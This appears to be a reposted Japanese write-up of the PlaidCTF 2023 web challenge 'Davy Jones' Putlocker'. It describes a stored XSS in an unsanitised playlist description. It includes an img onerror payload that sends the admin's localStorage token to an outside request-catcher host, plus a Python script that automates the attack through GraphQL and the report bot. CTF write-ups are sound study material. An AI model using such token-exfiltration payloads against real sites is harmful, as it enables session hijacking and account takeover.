CTF导航 CTF导航

PlaidCTF 2023 Writeup

WriteUp 2年前 (2023) admin
491 0 0

[web] Davy Jones’ Putlocker

URLを報告する部分があるのでXSSとかCSRFを引き起こす必要がありそう。
ログインした後に指定ページを開いてくれる。

フラグは/graphqlのmutationでflagを呼び出せばいい。
管理者権限の認証情報があればフラグが出てくる。
なので、とりあえず管理者のtokenを抜き出してくることを考えよう。

クライアントサイドはReactで書かれているので色々grepしてみると、dangerouslySetInnerHTMLが使われている部分がある。
ここはHTMLが生で出力されるが、/packages/server/src/renderHtml.mtsにあるように
micromarkというmarkdown2htmlのレンダラーの出力結果が渡されるようである。

だが、よくよく見ると、playlistのdescriptionはそういった処理が嚙んでいないように見え、そのままHTMLが出力されていそうである。
つまり、XSSが可能そう。
試してみよう。

Create Playlistでdescriptionに<img src="x" onerror="alert(1)">を入れて、
/user/3b432966-7dd4-451d-aedb-e8eaf4d27a15みたいにuserのページを開くとアラートが上がってきた。

<img src=x onerror="fetch(`https://yours.requestcatcher.com/test`,{method:`POST`,body:`${localStorage.token}`})">

みたいな感じで送って、報告すればtokenが得られる。
時間制限が割と厳しいので大部分を以下のように自動化した。

import requests
import random
import string

def get_random_string(length):
   return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

host = 'http://[yours].dubs.putlocker.chal.pwni.ng:20002'
username = get_random_string(10)
password = get_random_string(10)

def send_graphql(op_name, query, token=None):
    sent_json = {
        "operationName":op_name,
        "variables":{},
        "query":query
    }
    headers = {} if token is None else {'authorization': token}

    return requests.post(f'{host}/graphql', json=sent_json, headers=headers).json()

token = send_graphql("Register", "mutation Register { register(name: \""+username+"\", password: \"" + password + "\")}")['data']['register']
print(token)

playlist_id = send_graphql("CreatePlaylist", "mutation CreatePlaylist {  createPlaylist(    name: \"attack!\"    description: \"<img src=x onerror=\\\"fetch(`https://yours.requestcatcher.com/test`,{method:`POST`,body:`${localStorage.token}`})\\\">\"  ) {    id    __typename  }}", token)
playlist_id = playlist_id['data']['createPlaylist']['id']
print(playlist_id)

user_id = send_graphql("PlaylistQuery", "query PlaylistQuery {\n  playlist(id: \"" + playlist_id + "\") {\n    id\n    name\n    description\n    episodes {\n      id\n      name\n      __typename\n    }\n    owner {\n      id\n      name\n      __typename\n    }\n    __typename\n  }\n}", token)
user_id = user_id['data']['playlist']['owner']['id']

sent_url = host + '/user/' + user_id
print(sent_url)
send_graphql("Report", "mutation Report {\n  report(\n    url: \"" + sent_url + "\"\n  )\n}", token)

admin_token = input('Enter admin_token: ')

print(send_graphql("Flag", "mutation Flag {\n  flag}", admin_token))

 

原文始发于hamayanhamayan:PlaidCTF 2023 Writeup

版权声明:admin 发表于 2023年4月18日 上午9:04。
转载请注明:PlaidCTF 2023 Writeup | CTF导航

相关文章

CrewCTF 2023 Writeups
admin
329
NepnepxCATCTF部分WriteUp
admin
1,160
强网杯-WriteUp
admin
1,633
【WP】2022年春秋杯春季赛Misc、Crypto类题目解析
admin
1,853
DASCTF 2023七月赛-WriteUp By EDISEC
admin
336
BYUCTF 2024 Writeups
admin
68

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

第八届强网杯 writeup by Mini-Venom
0
【Android CTF] 鸿蒙逆向 — SHCTF – Android?Harmony!题解
0
第八届御网杯 线上下线pwn writeup by Mini-Venom
0
强网杯 2024 初赛 Writeup
0
2024第四届“网鼎杯”白虎组 writeup
0
Blue Water CTF 2024 re OORM wp 模拟执行爆破+剪枝
0
【Hardware】CrewCTF 2024 Sniff One && Sniff Two
0
web选手入门pwn(20) ——网鼎杯PWN01
0
2024第四届“网鼎杯”青龙组 writeup
0
【2024御网杯】线下半决赛Misc WriteUp
0